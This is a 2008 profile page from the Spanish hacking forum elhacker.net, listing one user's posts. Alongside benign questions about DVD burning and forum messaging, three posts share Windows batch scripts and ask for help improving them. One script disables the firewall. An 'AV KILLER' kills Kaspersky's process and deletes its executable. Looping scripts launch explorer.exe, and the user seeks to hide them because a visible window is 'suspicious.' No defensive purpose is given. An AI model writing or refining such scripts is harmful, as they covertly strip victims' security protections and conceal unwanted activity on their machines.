elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Sugerencias y dudas sobre el Foro / Problema mandando mensajes personales. en: 2 Septiembre 2008, 23:27 pm
Ni idea porque me tira este cartel

El mensaje personal no se pudo enviar a 'xxxx' debído a que excediste el límite de mensajes personales

Y eso que en la bandeja de entrada no tengo nada y habre mandado como mucho 10 mensajes personales
2  Informática / Software / Como uso y grabo bien con mi grabadora? en: 19 Marzo 2008, 05:20 am
Hola .. buenas noches ! xD Me compre una grabadora de DVD. Pero no la se usar nunca use una y no tengo la minima idea de esto. Se que hay que usar el Nero.. me compre unos dvd no regrabables y ya me dijeron como grabar archivos musica o documentos en los dvd. La cosa es que por ejemplo yo tengo unos cuantos capitulos de anime en formato .avi alrededor de 170MB pesan. Quiero saber como hago para poder grabarlos en CD DVD y luego verlos en la DVD de la tele? Me dijeron algo asi como quemando el archivo no tengo ni idea :( Soy re tonto xD. Haber si me pudieran ayudar asi no me mando cagadas con los cd dvd que se estropean facilmente.
3  Programación / Scripting / Este script esta bien? en: 9 Enero 2008, 17:29 pm
Citar
@echo off
netsh firewall set opmode mode = DISABLE
pause
exit
net start SharedAccess
pause
exit
@echo off
:bucle
start /min explorer.exe
ping -n 5 localhost > nul
start /min explorer.exe
ping -n 5 localhost > nul
goto bucle

Quisiera saber si puedo ocultar la ventana del explorer cuando se ejecuta. Si ejecutan el explorer.exe van a ver que aparece ahi abajo en la barra. Lo unico que pude hacer es /min para que salga minimizado pero mi objetivo seria ocultarlo.
4  Programación / Scripting / Como seria mi propio AV KILLER en .bat ? en: 7 Enero 2008, 06:12 am
Muchas gracias.. Mira quiero hacer un AV KILLER para unos cuantos antivirus seria algo asi?


Citar
@echo off
title AV KILLER
taskkill /f /im kav.exe
del /f /q "C:\Archivos de programa\Kaspersky\kav.exe"
exit

Eso no desinstalaria el antivirus pero lo dejaria inoperable? tengo duda con la funcion /a de del si uso esa funcion no puedo hacer que elimine la carpeta entera de Kaspersky?
5  Programación / Scripting / Como hacer funcionar este batch perfectamente? en: 7 Enero 2008, 00:53 am
Hola con el poco tiempo que estuve leyendo estuve aprendiendo muy pocas cosas porque estaba medio apurado es asi.. hice un pequeño batch que lo que hace es abrir el explorer.exe cada tanto tiempo



Citar
@echo off
start /min explorer.exe
ping -n 5 127.0.0.1 >nul
start /min explorer.exe
ping -n 5 127.0.0.1 >nul
start /min explorer.exe
exit

Ahora estas son mis dudas.. Hay alguna manera para programar en batch que cada tanto tiempo se ejecute? y que no tenga que copiar eso muchas veces osea un seguimiento.. como llamarlo por asi decirlo cada tanto. Otra duda mia es le hice /min para que se minimize pero no hay alguna forma de que se ejecute oculto? algo como hide que no se vea la ventana abierta eso seria muy sospechoso. Por ultimo cuando hago esto la ventana ms-dos se mantiene abierta y no quiero que se quede ahi hasta que se ejecute todo. Y por ultimo deje programado unas funciones con el at y me gustaria borrarlas osea delete y nose como seria la funcion o cmd para eso. Estas son mis dudas por ahora si pudieran ayudarme estaria re agradecido


PD: SRRY no sabia donde poner esto no vi la sección correspondiente :(
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines